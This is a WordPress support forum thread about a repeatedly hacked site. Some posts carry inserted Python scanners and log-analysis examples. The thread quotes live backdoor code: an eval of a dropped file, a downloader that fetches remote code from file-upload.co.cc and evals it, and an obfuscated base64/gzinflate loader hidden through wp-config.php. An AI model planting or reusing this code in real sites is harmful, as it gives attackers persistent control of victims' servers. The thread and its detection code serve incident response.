WordPress.org

WordPress Keeps Being Hacked! (26 posts)

  1. AmishPatel
    Member
    Posted 4 years ago #

    For some reason, my index.php in my root folder seems to keep getting compromised. I found last week that within the file there had been a link to a viagra file in the main directory. I fixed this, changed passwords, etc. and upgraded WP, but it has happened again! The following was in my index.php file:

    eval(file_get_contents("/home/wrestlin/public_html/js/751b80d2ef316f0a050bbc2867bc028f"));

    the file in question was littered with viagra text.

    I have no spyware or anything like this on my machine, and the passwords are changed regularly. Only one other person has access to FTP, but surely it's not him and it shows ME as the owner of both of these files in terms of modifying etc.

    I have looked at the index.php file and it says modified 29/01/2010 and the viagra file in question was uploaded today.

    I don't know what to do. I've done everything I know in terms of security, passwords, etc., but it keeps happening, and it has also destroyed my search engine credibility.

  2. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you're done:
    http://codex.wordpress.org/Hardening_WordPress
    Just in case you haven't read everything.

    Do you have access to server access logs? Look at the timestamp for your index.php file to see exactly what time it was altered.

    Compare that to your access logs to see where it was being altered from.

    Quite possibly, someone has inserted a rogue file deep on your server somewhere that keeps allowing access to your files.

    That's what happened to me. I had two files, neither in my WP install... they were hidden well.

  3. AmishPatel
    Member
    Posted 4 years ago #

    Hey,

    I followed the re-install and hardening instructions after the first attempt. I think I have access to server logs, I will see if they help!

    Thanks..

  4. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    I bet they will... I've seen this fix help many people. After you track down and delete the rogue files, go through the process of changing passwords again. Maybe reinstall WP, also... reinstall all plugins, they can get dirty too. And your themes: either reinstall or clean up.

  5. Samuel B
    moderator
    Posted 4 years ago #

    RVoodoo knows of what he speaks - do everything he has mentioned diligently

  6. starapple
    Member
    Posted 4 years ago #

    I've tried to block access to some IPs and .ru domains by .htaccess but this gets overwritten with each WP update or editing of permalinks. This seems an area to be addressed by the developers.

  7. Chris_K
    Member
    Posted 4 years ago #

    @starapple -- be sure you don't put your .htaccess tweaks between the # BEGIN WORDPRESS and # END WORDPRESS lines of the file.

  8. Jonas Grumby
    Member
    Posted 4 years ago #

    First of all, you should be running a firewall.

    WordPress Firewall SEO

    You also need: WP Security Scan

    and: WP-DBManager

  9. AmishPatel
    Member
    Posted 4 years ago #

    I will follow the above.

    Index.php was compromised again today...

    I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    Checking access logs... I found the entry of the malicious file and it came from my IP, so I'm not sure why that's the case - my machine is clean.

  10. AmishPatel
    Member
    Posted 4 years ago #

    Guys,

    I need help. I can't stop this! I have done everything that's been suggested and then some.

    My index.php files are no longer being compromised, but instead now, somehow my header.php is being edited with the following line being inserted at the top:

    <? eval(file_get_contents("/my directories/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>

    It happened yesterday, but the file was placed in a different WordPress directory.

    Previous to that, these type of files were being placed in my directories at root level.

    We have checked FTP logs, but there is absolutely nothing. I and one other person have admin/FTP access. The other guy only has access to our WordPress folder and not root.

    I don't believe there is anything malicious on my machine - I've done spyware tests etc.

    I don't know what to do, I can't stop this, and it's happening every day, and the script can seemingly be inserted into any directory on my server and any file can seemingly be edited to reflect where this is.

    I've changed passwords, made sure dirs are chmodded correctly, deleted unwanted items etc., but I just can't stop this and it's killing my Website and my search engine standings.

    Can someone please help or offer suggestions on anyone who could help? I can't do anymore on my end that I know of..

  11. AmishPatel
    Member
    Posted 4 years ago #

    Anybody?

  12. I have done everything that's been suggested and then some.

    We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.

    I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    There is no easy fix, and did you really do what RVoodoo and Samboll said to do?

    Try this:

    Make a complete file and database copy of your blog and put that somewhere safe. Export your database to a WXR file and keep that in a safe place too.

    Take a deep breath. Now with those backups and WXR files preserved safely, DELETE YOUR WORDPRESS DATABASE AND ALL-OF-YOUR-FILES-AND-DIRECTORIES ON YOUR WEB SERVER THAT YOU BACKED UP.

    Bet that got your attention?

    Since this keeps coming back, you are not getting the infected files. Or the PC you are accessing this via really is compromised too. Once it's all deleted download fresh copies of everything from the source and do not touch your backup.

    Get WordPress running and import the WXR file into your new blank blog. Only use the file backup for jpegs, images, etc. that are referenced in your blog.

    If all that does not work, get a beer, relax for a while and then solicit help from jobs.wordpress.net for this problem.

    Good luck.

    Edit: Oh, and using a text editor, examine the WXR (don't modify it!) for any compromised links too. If the hack is in your export, then putting that back would be bad. Make sure it's clean too.

  13. Jonas Grumby
    Member
    Posted 4 years ago #

    Keep in mind that it might be the way your server is set up and could have nothing to do w/ WordPress. Maybe you should contact your hosting company tech support (unless that is you).

    So you set up the Firewall and followed all the suggestions in WP Security Scan, and you uploaded a fresh copy of all of the WP files and your config file? You can also use WP DB Manager to optimize and repair the database as well as to back it up, and you can use it to empty or drop tables from the database.

    I tried once to export a WP site's data and then import it but it didn't work very well at all. It imported the categories but not the content.

    Personally I would exhaust all support options before deleting the database. Deleting the files is no big deal. You can re-upload them any time. You can even upload them to a different domain or folder and then run two lines of code to make the database recognize the new URL.

    Another thing you could do rather than deleting your database is create a new one and modify your config file to point to it. Either way you would have to initialize the database to build the tables but you would still have a way to access your previous data. Aside from completely deleting the database you can also drop tables or just empty the tables. The advantage of the former is that you would not have to modify your config file and the advantage of the latter is that you also would not need to initialize the database. Just throwing all the options out there.

    If you're doing any of this on a small site your best bet might be to copy & paste your content back in w/ the editor in HTML mode. That way you could check for any wacky code in the content. You can save the code for each page in a text file and then put it back into your clean database.

    Try hosting support before trying any of this drastic stuff.

  14. AmishPatel
    Member
    Posted 4 years ago #

    Happened again.

    This time actual links were also inserted into footer.php. So that's header.php, footer.php, and index.php in root that have all been modified now.

    I have disabled FTP access completely to see if this stops the problem. I have gone through all the steps as advised apart from your suggestions jdembowski - bit scared to do that and really don't have time to now I've started a new job!

    I tried posting at wordpress jobs but it's really annoying me because my post won't go through properly - keeps saying my spam answer is wrong, when it's not. Tried a lot of times now.

    I've had it with this and don't know what to do anymore. Would anyone here be so kind as to take a look? I don't mind paying if it can be solved - I just have no time to deal with this anymore and I'm quite desperate.. it's also killing my search engine rank and traffic in general.

    I'll be forever grateful if someone can help out..

  15. AmishPatel
    Member
    Posted 4 years ago #

    Usually the hacked file just contains divs and viagra link, but this one today contained:

    <?
    // Trigger list: only requests whose URL matches one of these entries get the
    // remote payload, so anyone browsing other pages sees a normal site.
    $dir ='6845734';
    $pages = 'www.wrestling-edge.com
    www.wrestling-edge.com/mma-news
    www.wrestling-edge.com/mma-news/brock-lesnars-next-ufc-fight-against-shane-carwin-cancelled.html
    www.wrestling-edge.com/mma-news/chuck-liddell-and-mma-come-to-the-simpsons-this-sunday-night.html
    www.wrestling-edge.com/search/kelly+kelly+naked
    www.wrestling-edge.com/search/mickie+james+ass+pics
    www.wrestling-edge.com/site
    www.wrestling-edge.com/site/advertise
    www.wrestling-edge.com/wrestling-ppv-coverage
    www.wrestling-edge.com/wrestling-videos
    www.wrestling-edge.com/wwe-news/chyna-in-a-japan-hall-of-fame-update-on-mickies-country-music-more.html
    www.wrestling-edge.com/wwe-news/raw-going-to-three-hours-wrestlemania-2011-location-more.html
    www.wrestling-edge.com/wwe-news/spoiler-smackdown-elimination-chamber-match-revealed.html
    www.wrestling-edge.com/wwe-news/the-rock-hints-at-wwe-return-says-he-wants-to-do-more-than-guest-host-raw.html
    www.wrestling-edge.com/wwe-news/wwe-smackdown-vs-raw-2010-road-to-wrestlemania-storyline-info.html
    www.wrestling-edge.com/wwe-results/wwe-raw-results-october-5th-2009.html
    www.wrestling-edge.com/wwe-results/wwe-royal-rumble-2010-ppv-results.html
    ';
    // These two lines sit before the loop in the posted file, where $page is not yet
    // defined; they are reproduced exactly as posted.
    @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
    $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
    $pages=explode("\r\n",$pages);
    // Normalise the requested URL: host + URI with "www." and all slashes removed.
    $url=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
    $url=str_replace('/','',$url);
    foreach($pages as $page){
       $page=trim(str_replace('www.','',$page));
       if ($url==str_replace('/','',$page)){
          // Matched: fetch the payload for this page (keyed by md5 of the URL) from the
          // remote host and execute it. file_get_contents first, cURL as the fallback.
          if(ini_get('allow_url_fopen')==1){
             @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
          }
          else{
             if(function_exists('curl_init')){
                $ch = curl_init();
                $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
                curl_setopt($ch, CURLOPT_URL, $c_url);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 10);
                $data =  curl_exec($ch);
                @eval($data);
             }
          }
          break;
       }
    }
    ?>

    Weirdly, it still produced the same output on Google's cache for the Website. The links in footer.php were just standard href tags to numerous viagra and the like sites.

  16. esmi
    Forum Moderator
    Posted 4 years ago #

  17. cdkrall
    Member
    Posted 4 years ago #

    Are you using Bad Behavior and Spam Karma?

  18. RangerPretzel
    Member
    Posted 4 years ago #

    Sounds to me like your server has a rootkit installed.

    Is this your server? or is this on a host provider?

  19. AmishPatel
    Member
    Posted 4 years ago #

    Not sure what a rootkit is..

    This is my dedicated server, hosted with gigenet.

    Not using Bad Behavior or Spam Karma... but I'm guessing if the other plugins can't stop this, then they may be similar.

  20. AmishPatel
    Member
    Posted 4 years ago #

    Ok, not sure if i found the problem or not. I was looking in my wp-config.php file and found the following at the end, which was different to the normal template:

    /**
     * Retrieve the name of the highest priority template file that exists.
     *
     * Searches in the STYLESHEETPATH before TEMPLATEPATH so that themes which
     * inherit from a parent theme can just overload one file.
     *
     * @since 2.7.0 */
    // The docblock above is copied from a WordPress core function (locate_template in
    // wp-includes/theme.php) so that the appended include looks like part of the stock
    // file. A stock wp-config.php includes exactly one file: wp-settings.php.
    include_once('wp-template.php');
    
    ?>

    I went to wp-template.php in my blog folder and it had the following crap:

    <?
    // The encoded payload is truncated in the original post. gzinflate(base64_decode(...))
    // is a standard obfuscation wrapper: the real code exists only in memory after decoding.
    eval(gzinflate(base64_decode('...ovYJS46i3xfp2/P3YdRvR1uRg2POZq/+mKWj6PjgiHQ2X6Tv5umrdxevQ6S3zeEpzt/8OTtfzEfRyVeCA/4DQG5OH0xXJELov1H9+DvsPdf1V8O85G1e9RC2Xf8D')));
    ?>

    Deleted the lines out of the config file and the template file, but still not sure if this will be enough, or if it was the backdoor in question..
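    A small indicator scanner for the backdoor idioms quoted in this thread: eval(file_get_contents(...)) pointed at a dropped file or a remote URL (posts 10 and 15), and eval(gzinflate(base64_decode(...))) plus a foreign include_once appended to wp-config.php (post 20). This is an added example, not code from the thread or from WordPress. The sample sources are condensed, constructed copies of what was posted, the rule names are the author's own, and the regexes key on the function names as they are spelled in PHP (eval, file_get_contents, gzinflate, base64_decode), which is what any text search has to use. It is a triage aid, not a proof of cleanliness: it misses code that assembles function names at runtime, and it will flag the rare legitimate plugin that uses eval.

```python
import os
import re
import tempfile
from typing import Dict, List

# Indicator rules keyed by a descriptive name; each is one idiom seen in this
# thread plus the common variants of the same idiom.
RULES: Dict[str, re.Pattern] = {
    # eval(file_get_contents(...)) / @eval(@file_get_contents(...)), local path or URL
    "eval_of_fetched_file": re.compile(r"@?eval\s*\(\s*@?file_get_contents\s*\("),
    # eval(gzinflate(base64_decode('...'))) and the usual decode/inflate wrappers
    "eval_of_encoded_blob": re.compile(
        r"@?eval\s*\(\s*@?(?:gzinflate|gzuncompress|gzdecode|str_rot13|base64_decode)\s*\("
    ),
    # eval($data) where $data was filled by curl_exec() or similar
    "eval_of_variable": re.compile(r"@?eval\s*\(\s*\$\w+\s*\)"),
    # a literal http(s) URL handed to file_get_contents or cURL
    "remote_payload_url": re.compile(r"(?:file_get_contents|CURLOPT_URL)[^;\n]*['\"]https?://"),
    # PHP short open tag "<?"; WordPress core and nearly all plugins use "<?php"
    "short_open_tag": re.compile(r"<\?(?!php\b|xml\b|=)"),
    # the pharma spam this infection injects
    "spam_keyword": re.compile(r"\b(?:viagra|cialis|levitra)\b", re.IGNORECASE),
}
# A stock wp-config.php includes exactly one file, wp-settings.php; anything
# else being included/required there is the pattern from post 20.
INCLUDE_RX = re.compile(
    r"\b(?:include|include_once|require|require_once)\s*\(?\s*[^;]*?['\"]([^'\"]+\.php)['\"]"
)
PHP_EXTENSIONS = (".php", ".php5", ".phtml", ".inc")


def scan_php_source(src: str, filename: str = "") -> List[str]:
    """Return the names of every indicator that fires on one PHP source text."""
    findings = [name for name, rx in RULES.items() if rx.search(src)]
    if os.path.basename(filename) == "wp-config.php":
        for inc in INCLUDE_RX.findall(src):
            if os.path.basename(inc) != "wp-settings.php":
                findings.append("unexpected_include_in_wp_config:" + inc)
    return findings


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk an install; map relative path -> findings, for files with findings only."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXTENSIONS):
                continue  # non-PHP files are never opened
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read(), path)
            except OSError:
                continue
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed samples, condensed from the code quoted in this thread.
SAMPLE_HEADER_INJECT = (
    '<? eval(file_get_contents("/srv/www/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>'
)
SAMPLE_DOWNLOADER = """<?
$dir ='6845734';
$url=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
if(ini_get('allow_url_fopen')==1){
   @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($url)));
} else {
   $ch = curl_init();
   curl_setopt($ch, CURLOPT_URL, 'http://file-upload.co.cc/'.$dir.'/'.md5($url));
   $data = curl_exec($ch);
   @eval($data);
}
?>"""
SAMPLE_WP_CONFIG_TAIL = """<?php
define('DB_NAME', 'wordpress');
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');
require_once(ABSPATH . 'wp-settings.php');
include_once('wp-template.php');
?>"""
SAMPLE_WP_TEMPLATE = "<?\neval(gzinflate(base64_decode('ovYJS46i3xfp2...')));\n?>"
SAMPLE_CLEAN_WP_CONFIG = SAMPLE_WP_CONFIG_TAIL.replace("include_once('wp-template.php');\n", "")


def demo_scan() -> Dict[str, List[str]]:
    """Lay the samples out as a tiny install in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "wp-config.php": SAMPLE_WP_CONFIG_TAIL,
            "wp-template.php": SAMPLE_WP_TEMPLATE,
            "wp-content/themes/t/header.php": SAMPLE_HEADER_INJECT,
            "wp-includes/functions.php": "<?php\nfunction wp_noop() {}\n",
            "wp-content/uploads/2010/01/photo.jpg": "not php, never opened",
        }
        for relpath, body in files.items():
            full = os.path.join(root, relpath)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo_scan().items()):
        print(path, hits)
```

    Run scan_tree against the document root and every other vhost on the box, not only the WordPress directory, since the thread's moderator found his rogue files outside the install. Treat any hit in wp-config.php, in wp-content/uploads, or in a file the official WordPress tarball does not contain as a priority.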

  21. AmishPatel
    Member
    Posted 4 years ago #

    I am going to do another clean and sweep of the DB tonight, but in the mean time I'm stumped again.

    I have cleaned and gone over my site searching for traces of the keywords 'viagra' and 'base_64', run Exploit Scanner, checked config, settings, theme files etc., which is where the hacks usually are, and nothing. Also checked .htaccess and through files/folders for malicious files but no luck.

    However, this is the first time I've removed everything and google is STILL caching my website as a viagra site. See: http://www.google.co.uk/search?hl=en&source=hp&q=wrestling-edge&btnG=Google+Search&meta=&aq=f&oq=

    I even made the files that are constantly getting hacked, immutable.

    Does anyone have any clue? I can't see any clues in the source code of the cached viagra website either.

    I'm so sick of this.

  22. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Have you ever found any php files tucked away deep, like in your uploads folder, or even somewhere else on your server? I mentioned looking for rogue files earlier in the thread...never really heard back from you on the result.

    This talks about how I cleaned my install:
    http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    And here is a different post I just made for someone specifically, but it goes a bit more in depth about using your access logs to find and delete php files that don't belong:
    http://www.rvoodoo.com/2010/03/using-access-logs-to-find-rogue-files-when-wordpress-is-hacked/

  23. AmishPatel
    Member
    Posted 4 years ago #

    Hi RVoodoo,

    I've checked all folders for trace of rogue files... I probably need to do it thoroughly again, but I deleted anything suspicious or anything I didn't use. I pretty much deleted ANYTHING that was redundant on the Website..

    Access logs and error logs haven't really given me any information at all unfortunately.

    Can't believe how long this has gone on and it's really hurt my traffic.

  24. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    so...when your file was altered, and you checked the access logs for activity to the altered file at the exact time shown by the timestamp of the altered file, what did it show?

    Not the IP address, but the whole line, especially the second url/path that may be referenced at the end of the entry?
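    The procedure Rev. Voodoo lays out in posts 2 and 24 (take the altered file's timestamp, pull the access-log entries from that moment, and read the whole line including the referer at the end, not just the IP) as an added example; this is not code from the thread. The log lines are constructed in Apache "combined" format with documentation-range IPs, the file mtime is made up, and the heuristic in is_suspicious (a POST to a PHP file that is not a normal WordPress endpoint, or any PHP served out of wp-content/uploads) is the author's. Two caveats that matter on this thread's server: log timestamps carry a timezone offset, so the file's st_mtime must be converted with the same offset before comparing; and on a dedicated box hosting several sites the request that wrote the file may be in another vhost's log, because the shell doing the writing need not live in this WordPress install.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Optional

# Apache "combined" log format. The two trailing quoted fields are the referer
# (the "second url/path" at the end of the entry) and the user agent.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# POST targets a healthy WordPress receives all day; any other .php being POSTed
# to is worth a look.
KNOWN_POST_TARGETS = {
    "/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/post.php", "/wp-admin/async-upload.php",
}


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; None if it does not match."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    # e.g. "29/Jan/2010:14:03:05 +0000"; %z parses the numeric offset
    rec["time"] = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = m.group("target").split("?", 1)[0]  # drop the query string
    return rec


def requests_near(log_lines: Iterable[str], mtime: datetime, window_seconds: int = 60) -> List[Dict[str, object]]:
    """Requests logged within +/- window_seconds of the file's mtime, oldest first."""
    if mtime.tzinfo is None:
        raise ValueError("mtime must be tz-aware: datetime.fromtimestamp(st.st_mtime, timezone.utc)")
    window = timedelta(seconds=window_seconds)
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec is not None and abs(rec["time"] - mtime) <= window:
            rec["delta_s"] = (rec["time"] - mtime).total_seconds()
            hits.append(rec)
    return sorted(hits, key=lambda r: r["time"])


def is_suspicious(rec: Dict[str, object]) -> bool:
    """A dropped shell being driven shows up as a POST to an odd .php, or as PHP
    executing out of the upload directory, which should only ever serve media."""
    path = str(rec["path"]).lower()
    if not path.endswith(".php"):
        return False
    if rec["method"] == "POST" and path not in KNOWN_POST_TARGETS:
        return True
    return "/wp-content/uploads/" in path


def suspicious_near(log_lines: Iterable[str], mtime: datetime, window_seconds: int = 60) -> List[str]:
    """One printable line per suspicious request: offset, IP, method, target, referer."""
    return [
        f'{r["delta_s"]:+.0f}s {r["ip"]} {r["method"]} {r["target"]} referer={r["referer"]}'
        for r in requests_near(log_lines, mtime, window_seconds)
        if is_suspicious(r)
    ]


# Constructed sample: the rewritten header.php's mtime and a slice of access_log.
FILE_MTIME = datetime(2010, 1, 29, 14, 3, 22, tzinfo=timezone.utc)
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jan/2010:14:01:50 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [29/Jan/2010:14:03:05 +0000] "POST /wp-content/uploads/2010/01/sh.php?x=1 HTTP/1.1" 200 512 '
    '"http://example.com/wp-content/uploads/2010/01/sh.php" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '203.0.113.7 - - [29/Jan/2010:14:03:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.com/wp-login.php" "Mozilla/5.0"',
    '192.0.2.44 - - [29/Jan/2010:14:03:30 +0000] "GET / HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [29/Jan/2010:14:03:31 +0000] "GET /wp-content/themes/foo/style.css HTTP/1.1" 200 8000 "http://example.com/" "Mozilla/5.0"',
    '192.0.2.99 - - [29/Jan/2010:15:30:00 +0000] "GET /about/ HTTP/1.1" 200 5000 "-" "Googlebot/2.1"',
    'this line is not in combined format and is skipped',
]

if __name__ == "__main__":
    for line in suspicious_near(SAMPLE_LOG, FILE_MTIME):
        print(line)
```

    In the constructed sample the only flagged entry is the POST to a PHP file under wp-content/uploads seventeen seconds before header.php was written, with the shell's own URL as referer; the legitimate login POST in the same window is not flagged. If the window shows nothing but your own IP, the write did not come through this web server's front door: widen the window, check the other vhosts' logs, the FTP and SSH logs and cron, and consider that the file's mtime may have been reset after the write.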

  25. henkholland
    Member
    Posted 4 years ago #

    Did you run this one on your local workstation and on the friends workstation?
    http://www.malwarebytes.org/

  26. AmishPatel
    Member
    Posted 4 years ago #

    henkholland - yes, our computers are malware free.

    RVoodoo... generally these files magically appear on the server, but their last modified date is in the past. FTP logs show nothing apart from my IP editing a bunch of files. It has no useful information in there. Modified dates never match up against access_logs either... it's hopeless. I've tried that method.
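    The situation in the last post (files that appear with a last-modified date in the past, so nothing lines up with the access log) has a workable answer, given here as an added example that is not code from the thread. A file's mtime can be set to any value from userland (touch -d, or the utime() call the attacker's script makes after writing), but the inode change time, ctime, is set by the kernel on every content or metadata change and cannot be set from userland without root or raw disk access; a file whose ctime is hours or years later than its mtime was rewritten and then backdated, and stat or find -cnewer will show it when the mtime is useless. The second half is a content baseline: hash the whole tree right after a clean reinstall and diff against it each time the site is defaced, which also catches the dropped files. The directory layout, file contents and the January 2010 timestamp are constructed for the demo. Caveats: the ctime gap is Linux/BSD semantics (on Windows st_ctime is the creation time); a copy made with preserved timestamps (cp -p, rsync -t, tar) also shows a large gap, so take the baseline immediately after deployment; and if the attacker has root, as the rootkit suggestion in post 18 implies, neither timestamps nor hashes read from the same box can be trusted.

```python
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def file_sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def rel(path: str, root: str) -> str:
    return os.path.relpath(path, root).replace(os.sep, "/")


def snapshot(root: str) -> Dict[str, str]:
    """Map every regular file under root (symlinks skipped) to its SHA-256."""
    out: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            out[rel(p, root)] = file_sha256(p)
    return out


def diff_snapshots(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, List[str]]:
    """Files added, removed, or whose content changed between two snapshots."""
    common = set(before) & set(after)
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(p for p in common if before[p] != after[p]),
    }


def backdated_files(root: str, min_gap_seconds: int = 3600) -> List[Tuple[str, float, float]]:
    """Files whose ctime is at least min_gap_seconds later than their mtime.

    utime()/touch can put any value in mtime; ctime is written by the kernel on
    every content or metadata change and is not settable from userland. A large
    gap means "rewritten, then backdated" (or copied with preserved timestamps,
    which is why the baseline belongs right after deployment).
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            try:
                st = os.stat(p, follow_symlinks=False)
            except OSError:
                continue
            if st.st_ctime - st.st_mtime >= min_gap_seconds:
                hits.append((rel(p, root), st.st_mtime, st.st_ctime))
    return sorted(hits)


# Constructed demo reproducing the thread: baseline a clean tree, then a theme
# file is rewritten and backdated to January 2010 and a rogue file is dropped.
BACKDATE_TO = 1264773600.0  # 2010-01-29 14:00:00 UTC, constructed
CLEAN_FILES = {
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
    "wp-content/themes/t/header.php": "<?php wp_head(); ?>\n",
}


def write(root: str, relpath: str, body: str) -> str:
    full = os.path.join(root, relpath)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(body)
    return full


def demo() -> Dict[str, object]:
    with tempfile.TemporaryDirectory() as root:
        for relpath, body in CLEAN_FILES.items():
            write(root, relpath, body)
        baseline = snapshot(root)
        # the "hack": prepend an eval include to header.php, reset its mtime, drop a file
        hdr = write(root, "wp-content/themes/t/header.php",
                    '<? eval(file_get_contents("/x/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>\n'
                    + CLEAN_FILES["wp-content/themes/t/header.php"])
        os.utime(hdr, (BACKDATE_TO, BACKDATE_TO))
        write(root, "wp-content/uploads/2010/01/sh.php", "<?php // constructed rogue file\n")
        return {
            "diff": diff_snapshots(baseline, snapshot(root)),
            "backdated": [p for p, _mtime, _ctime in backdated_files(root)],
        }


if __name__ == "__main__":
    print(demo())
```

    In the demo the hash diff reports header.php as changed and sh.php as added even though header.php's mtime says 2010, and backdated_files singles out header.php because its ctime is years after its mtime. On a real server, store the baseline off the box, and take the backdated file's ctime (not its mtime) as the moment to look up in the access logs.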

Topic Closed

This topic has been closed to new replies.
